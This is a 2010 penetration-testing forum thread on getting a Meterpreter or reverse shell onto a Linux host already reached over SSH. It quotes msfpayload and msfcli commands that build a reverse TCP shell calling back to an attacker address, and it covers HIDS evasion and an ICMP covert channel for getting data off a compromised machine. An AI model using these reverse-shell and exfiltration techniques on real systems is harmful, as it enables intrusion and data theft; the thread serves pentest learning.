.

How to use the Meterpreter once I have SSH working?

<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Tue Jun 29, 2010 8:33 pm

How to use the Meterpreter once I have SSH working?

Hi,

On a machine, I now have a working SSH connection using, let's say, username: "bob" and password: "secret".

Now how can I upload a "Meterpreter client" or something like that to this machine so I can use it to do more stuff?

As a note, once logged in to the target machine (using ssh, obviously), I can FTP back to my attacking machine, so copying the file is not the problem. What I need to know is which file to copy and how to use it!!! ???

Thanks
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Tue Jun 29, 2010 9:04 pm

Re: How to use the Meterpreter once I have SSH working?

I think it all depends - is it a linux or windows box that you have ssh access too? I've never seen a meterpreter payload available for linux os's.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Tue Jun 29, 2010 10:51 pm

Re: How to use the Meterpreter once I have SSH working?

You're wanting something like a reverse meterpreter shell, I assume? 

http://www.metasploit.com/modules/paylo ... everse_tcp

HTH.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Wed Jun 30, 2010 12:34 am

Re: How to use the Meterpreter once I have SSH working?

Ha, that's awesome. I went throughout the whole pwb course without knowing about this payload. Would've came in handy in multiple situations.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Wed Jun 30, 2010 5:01 am

Re: How to use the Meterpreter once I have SSH working?

@xXxKrisxXx: I am hacking a linux machine.

@hayabusa: Thanks, but once I have called the "generate" command, what's next? Does it create a file or something? I can't seem to find it... :-\
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Wed Jun 30, 2010 12:14 pm

Re: How to use the Meterpreter once I have SSH working?

eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Wed Jun 30, 2010 12:30 pm

Re: How to use the Meterpreter once I have SSH working?

These examples are probably what I was looking for:

  Code:
./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101
LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores


  Code:
./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp
LHOST=192.168.1.101 LPORT=443 E


I will give it a try tonight, thanks xXxKrisxXx
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

sil

User avatar

Hero Member
Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Wed Jun 30, 2010 2:46 pm

Re: How to use the Meterpreter once I have SSH working?

Also remember, netcat is your friend at the end of the day:

http://www.scribd.com/Penetration-Testi ... /d/3064507

A thing to keep in mind is HIDS. I try to act as if HIDS are always going to be installed on a machine. This means any introduction of new code, applications, or filename and timestamps changes can trigger bells and whistles. If you keep this in mind, it will allow you to take a step away from being too reliant on say metasploit or any other tool. E.g., you got your access however, you need more X... *nix provides a variety of tools already on the system that will allow you to do whatever you want to do. (nc, forward may be installed on some systems http://linux.die.net/man/1/forward, socat)

I've been tinkering with something on the Windows side of pentesting for situations like this... I call it TaiChiRedTeaming for lack of a cooler name. The goal is to use the system against itself. This morning I started tinkering with wmic and came up with Amphibios...

  Code:
rem   The purpose of Amphibios is to accumulate detailed information
rem   on the system in which launches Amphibios without introducing
rem   or installing applications on the system itself. The use of
rem   Amphibios can be correlated with either a system administrator
rem   documenting and detailing information on the system, or one can
rem   use the information for other means. For example, in performing
rem   a host based penetration test, the information gathered via say
rem   installed patches will allow a tester to determine the possible
rem   exposure state due to patches that weren't installed.

rem   Amphibios gathers information on all applications, patches,
rem   users, groups and diskspace on a machine. By putting this info
rem   all into one repository, the data can be used for quite a few
rem   purposes. While Amphibios is my first Windows based script (I
rem   come from a *nix background), I may or may not alter it to
rem   have the capabilities of sending data to a DB however, at this
rem   point in time, Amphibios is nothing more than a test slash
rem   work in progress. I may make it post to a remote db then have
rem   that system parse out which updates are installed, check for
rem   missing patches, updates, vulnerable software, then create a
rem   a structured and tactical penetration test against the output.

rem   ************************    NOTE    ************************

rem   Right now, I'm just familiarizing myself with wmic and
rem   powershell so - yes I do know this is butt ugly

rem   ************************    NOTE    ************************


So far it's butt ugly but I've got it to do what I've set out to do so far.

http://www.infiltrated.net/amphibiosxp.txt
http://www.infiltrated.net/amphibiosxp.bat (same file as above just renamed)

It's something I can literally copy and paste once I'm on a machine. I plan on eventually making it an xml file and parsing data from what it obtains into populating an attack plan on a machine. Think: "pseudo-heuristi-yet-focused pre-pentest tool". The beauty of it is, I install zero to get me enough information to see what I can use on the system to escalate, maintain status, subvert, etc.

Wish I had more time though, I plan on rewriting it from scratch. It's conceptual but a horribly good concept/idea. If I can get it working the way I want, I can probably automate more effective pentests with better results. Or... I can probably just learn powershell and win commands and accomplish nothing. In either event... Think outside the box


#########################################################

ADDED 3:57PMEST


Forgot to add Paketto (http://freshmeat.net/projects/paketto/). Has some interesting tools and there was an interesting document I read years back, can't remember who wrote it or what the name was. Went something like this (in terms of covertness)...

So you compromise a machine and need data OFF or ON. You choose an ICMP covert shell with the destination address going to ... WHO CARES, ANYONE. Your goal is to sniff the ICMP traffic and recompile the data you need. There is minimal pointing back to you.

You --> compromise machine
You --> create a covert ICMP tunnel somewhere along a line of site between you and compromised host
You --> sanitize compromise
You --> blindly spoof data TO machine from another machine along the line of site (remember, blind spoofing you don't care about the results)
Machine --> responds via ICMP messages to ... WHO CARES ... All you care about is seeing (sniffing) the data

Within the ICMP tunnel you can pretty much do whatever you'd like. Although you are blindly spoofing, you won't get an immediate response from the machine, but via sniffing you would see the results going to someone else. ... Make sense?
Last edited by sil on Wed Jun 30, 2010 3:04 pm, edited 1 time in total.

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software